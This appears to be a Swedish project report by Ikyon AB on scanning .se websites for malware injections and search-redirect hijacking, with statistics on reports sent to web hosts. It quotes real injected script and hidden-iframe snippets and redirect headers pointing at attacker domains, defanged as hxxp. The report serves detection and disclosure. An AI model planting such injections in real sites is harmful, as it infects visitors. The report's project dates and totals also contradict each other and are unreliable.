Add to collection(s) Add to saved
  1. Ingenjörsvetenskap
  2. Webbdesign

Ikyon - Internetfonden

Säkrare hemsida med .se
Jörgen Nilsson, Ikyon AB
25 februari 2014
1. Inledning
Projektet “Säkrare hemsida med .se” drevs av Ikyon under perioden 2011-05-01 till 2012-05-01. Under
denna period skickades 3854 rapporter ut för 1458 unika domännamn. Då webbplatser ständigt
infekteras finns ett kontinerligt behov av kontroll och rapportering.
2. Mål och syfte
Syftet med projektet har varit att regelbundet kontrollera samtliga webbplatser som använder en
.se-domän och att rapportera eventuella intrång till berört webbhotell. Webbhotellet kan antingen själv
vidta åtgärder eller kontakta kunden och be denne att vidta åtgärder.
Målet var att huvudsidor skulle kontrolleras en gång per dygn och att undersidor skulle kontrolleras
minst en gång per vecka.
3. Projektbeskrivning
I projektet har jag tittat på fyra olika metoder för att infektera webbplatser. Med de första två
metoderna, malware och virus, riskerar besökare på webbplatsen att själv bli infekterad med virus. Med
de två andra metoderna riskerar besökare att skickas vidare till en webbplats som kontrolleras av
hackern. Denna webbplats visar oftast reklam men skulle också kunna användas för att infektera
besökaren med virus.
Projektperioden var från och med 2013-01-01 till och med 2014-01-31.
Virus
De webbplatser som haft misstänkt innehåll har kontrollerats med flera antivirusprogram, bland annat
Kaspersky och F-Prot. Att flera antivirusprogram används beror på att antivirusprogram ofta är dåliga
på att upptäcka den kod som initierar spridningen av virus. Sannolikt ligger fokus för tillverkarna av
antivirusprogram på den fil som i slutändan försöker installeras på besökarens dator. Oftast består det
virus som hittats i detta projekt av krypterad javascriptkod
Malware
Med malware menas i detta projekt html-kod eller javascript-kod som anropar en extern adress
innehållande kod som antingen anropar ytterligare adresser eller försöker installera skadliga program
på besökarens dator. I exemplet nedan anropas sidan hxxp://addonrock.ru/Webcam.js och javascript på
denna adress körs på besökarens webbläsare:
<script type="text/javascript" src="hxxp://addonrock.ru/Webcam.js">
Samtliga adresser som riskerar att gå till skadliga sidor har ändrats så att http är hxxp. Detta har gjorts
för att förhindra oavsiktligt klickande och blockering av antivirusprogram. Misstänkta adresser
kontrolleras mot Google Safe Browsing.
SERP-hijacking
Med Search Engine Result Page hijacking, förkortat SERP-hijacking, “kapas” besökarens webbläsare
då vissa villkor uppfylls. Oftast är villkoret att besökaren hittat den infekterade webbplatsen via Google
eller annan sökmotor. Om besökaren uppfyller villkoren skickas denne vidare till en helt annan adress.
Denna adress står under hackerns kontroll och visar oftast reklam i syfte att generera en inkomst till
hackern. Då man inte skickas vidare om man går in direkt på webbplatsens adress kan det vara svårt
för ägaren av webbplatsen att upptäcka några problem. Tydligaste indikationen på problem är uteblivna
besökare. Vidarebefordringen sker med HTTP-koden 301 som används där servern ber webbläsaren att
gå till en annan adress istället för att servern returnerar en hemsida. Nedanstående exempel visar hur en
besökare vars header-information visar att denne närmast kommer från Google skickas vidare till
hxxp://htcssilence.ru/massmedia?8:
HTTP/1.1 301 Moved Permanently Date: Sat, 05 Jan 2013 18:39:44 GMT Server: Apache Location: hxxp://htcssilence.ru/massmedia?8 Connection: close Content­Type: text/html; charset=iso­8859­1
Header hijacking
I början av 2013 upptäcktes en ny angreppsmetod som påverkade webbplatser med gamla versioner av
Joomla. I serverns svar till webbläsaren lades en extra rad till:
Refresh: 25; url="h
p://www.dodonet.biz/shop/
xx "
Denna kod gör att webbläsaren går vidare till angiven adress, men först efter 25 sekunders paus. Om
besökaren går vidare till en annan adress inom 25 sekunder händer inte något. Detta gör att endast vissa
besökare skickas vidare och liksom med SERP-hijacking kan det vara svårt för ägaren av webbplatsen
att upptäcka att något är fel.
4. Leverabler
Rapportering av infekterade webbplatser skedde fortlöpande, dels på webbplatsen
http://sakrare.ikyon.se/, dels via e-postmeddelande till berörda webbhotell. På webbplatsen kan man få
översikt över samtliga rapporter och deras status men även filtrera efter ip-nummer och e-postadress.
Varje rapport har också en loggfil med mer information om intrånget.
E-postmeddelande skickades en gång om dagen. Webbhotell med flera infekterade sidor fick alltså en
sammanställning av de infekterade webbplatser som upptäckts sedan förra e-postmeddelandet.
Med rapport menas i denna slutrapport information om att en specifik adress är infekterad. Om flera
sidor under samma domännamn infekteras samtidigt genererar detta flera rapporter även om
webbhotellet endast får ett e-postmeddelande.
5. Resultat
Fullständig statistik över antalet scannade sidor saknas men under de sista två månaderna av
projektperioden scannades i genomsnitt 3 053 267 sidor per dygn för malware och virus och 3 855 003
sidor per dygn för SERP-hijacking och Header hijacking. Totalt kontrollerades 7 286 677 unika
adresser.
Totalt skickades 8269 rapporter, fördelat på 2639 domännamn.
Nedan följer antalet rapporter per dag uppdelat efter typ av attack.
I diagrammet nedan visas de 30 e-postadresser som fick flest rapporter, hur många rapporter som totalt
skickades och hur många av dem som fortfarande var aktiva vid projektperiodens slut.
Den genomsnittliga tiden från att en attack rapporterades tills den var åtgärdad var 10,37 dygn. Då
rapporter skickades med e-postmeddelande en gång per dygn kan det dröja upp till ett dygn från att
attacken rapporterades på hemsidan tills webbhotellet fick e-postmeddelande med rapporten.
Genomsnittstiden för de olika webbhotellen skiljer sig markant. Rapporter som var aktiva vid
projektperiodens slut är inte medräknade.
6. Utvärdering och analys
Spiken för skickade rapporter för malware 2013-04-02 berodde på ett intrång på servern med
IP-nummer 212.247.61.233, tillhörande Make IT i Boras AB och med abuse-adress [email protected].
På 565 olika domännamn lades nedanstående html-kod in:
<iframe src="hxxp://harakirievent.toypark.in/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
Detta intrång åtgärdades samma dag.
Under perioden 2013-07-27 till 2013-08-08 var det högre aktivitet än vanligt med rapporterna, i
genomsnitt 195 rapporter per dag. Totalt angreps 379 olika domännamn, för fem av dessa infekterades
100 sidor eller fler.
2013-12-03 skedde en ny spik för malware då 244 sidor på gsmteknik.se rapporterades som infekterade
efter att nedanstående html-kod lags in:
<script src="hxxp://vid1.tourismtome.com/18XeHAh8.php?id=53564268" type="text/javascript">
Webbplatsen låg vid intrånget på servern med IP-nummer 89.221.250.19 och rapporter skickades till
[email protected]. Av dessa 244 sidor var 111 fortfarande infekterade vid projektperiodens slut
2014-01-31. Ytterligare sidor på samma domän rapporterades vid senare datum och gsmteknik.se står
för 319 av de totalt 362 sidor som [email protected] fått rapport om men inte åtgärdat.
För [email protected] fanns vid projektperiodens slut 46 aktiva rapporter varav 29 gällde
styleofsweden.se. Samtliga sidor som inte åtgärdats var rapporterade under projektperiodens sista två
veckor.
Kostnaden för serverhyra hos Binero blev 7800 kr enligt budget. Kostnaden för serverhyra blev 8678 kr
istället för budgeterade 12043 kr. Detta då tjänster under hösten flyttades från Amazon till Binero utan
någon extra kostnad för projektet.
6a. Utvärdering av resultat
Av 8269 rapporter var 483 aktiva efter projektperiodens slut. Bortser man från rapporter till
[email protected] var ungefär hälften av dessa rapporter skickade under januari 2014.
I de flesta fall åtgärdade webbhotellen de infekterade hemsidorna även om det kunde ta några dagar.
Att åtgärd dröjt kan bero på helg och helgdagar, hög belastning och att man väntat på att kunden ska
vidta åtgärder.
6b. Förslag på förbättringar
I en del fall tar det tid innan antivirusprogrammen börjar detektera skadlig javascriptkod. Ikyon har
därför efter projektperiodens slut börjat utveckla ett antivirusprogram med egna signaturer för att
omedelbart efter upptäckt kunna börja scanna hemsidor efter nya intrångsmetoder. Även en blacklist är
planerad, för att kunna upptäcka den html-kod som hämtar information från andra adresser som ännu
inte blacklistats av Google Safe Browsing.
7. Framtida arbeten
Scanningen har efter projektperiodens slut fortsatt utan avbrott. Enda skillnaden är att scanningen nu
finansieras direkt av Stiftelsen för internetinfrastruktur och inte av Internetfonden. Då Stiftelsen för
internetinfrastruktur sedan 2 september 2013 ansvarar för driften av toppdomänen .nu sker nu även
scanning av sidor under denna toppdomän.
Related documents
Telia 3320 Internet Web
Telia 3320 Internet Web
Cyber Threat Assessment
Cyber Threat Assessment
Projektspecifikation
Projektspecifikation
Mål och riktlinjer för Lundby stadsdelsförvaltnings intranät
Mål och riktlinjer för Lundby stadsdelsförvaltnings intranät
Infektionssjukdomar. Målbeskrivning för AT läkare i NU sjukvården
Infektionssjukdomar. Målbeskrivning för AT läkare i NU sjukvården
Ewa Lundborg - Läkemedelsvärlden
Ewa Lundborg - Läkemedelsvärlden
Lathund i källkritik på internet (ur Kolla Källan, skolverket)
Lathund i källkritik på internet (ur Kolla Källan, skolverket)
Policy avseende användning av datorer och Internet inom Malmö stad.
Policy avseende användning av datorer och Internet inom Malmö stad.
Handledning Att arbeta med Webbplatser Office 365
Handledning Att arbeta med Webbplatser Office 365
Kränkt på Internet
Kränkt på Internet
Generell IT
Generell IT
Arbetsuppgifter och medarbetare
Arbetsuppgifter och medarbetare
Motivering - Riksdagens öppna data
Motivering - Riksdagens öppna data
Frågor till kund inför design
Frågor till kund inför design
Systemkrav - pam 2015 ( 20 kB)
Systemkrav - pam 2015 ( 20 kB)
Webbmail, Högsbynät AB Grunderna i Webbmail Starta
Webbmail, Högsbynät AB Grunderna i Webbmail Starta
Stämningsansökan - Diskrimineringsombudsmannen
Stämningsansökan - Diskrimineringsombudsmannen
Lokal inställningshanterare för Flash Player
Lokal inställningshanterare för Flash Player
Download